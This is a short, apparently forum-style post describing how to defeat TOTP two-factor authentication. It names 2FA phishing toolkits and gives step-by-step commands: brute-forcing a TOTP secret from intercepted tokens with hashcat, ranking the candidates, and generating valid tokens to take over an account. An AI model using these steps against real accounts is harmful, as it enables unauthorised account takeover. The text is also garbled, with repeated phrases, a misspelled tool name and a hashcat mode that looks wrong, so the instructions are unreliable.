On Github you can find Muraena and NecroBrowser or evilginx2 as open source, which can automate phishing attacks on 2FA.
If an attacker succeeds in intercepting two or more TOTP tokens
and log the time of use, he can use the tool
“hashcat” tool to determine the secret keys and then generate valid TOTP tokens themselves.
-
The tokens are written together with the timestamp in the format
format $TOKEN:$TIMESTAMP in a text file (in the example: totp-inputs.txt):
833060:1263384780
549115:1528848780 -
This text file is used to feed “hashcat” and log the results:
hashcat -m17300 -a3 -o totp-secrets.potfile totp-inputs.txt ?l?l?l?l?l?l?l
- After a few hours or days of computing time (depending on the
computing power and the quality of the keys) you look at the results
the results:
cut -d: -f3 totp-secrets.potfile | sort | uniq -c | sort -nr | head
- You can try the list of results starting from the top. After
another 5min you will have found a TOTP secret key that enables the
generation of valid tokens, and you can take over the account
take over the account:
oauthtool --base32 --totp “Secret Key” -d 6
OTP does not protect against intrusion on the server. Since in OTP the server and client execute the same algorithm for calculating and verifying the one-time password, an attacker can read the OTP parameters and thus calculate valid OTP tokens, especially for TOTP it is easy:
oauthtool --base32 --totp “Secret Key” -d 6
cheers . . .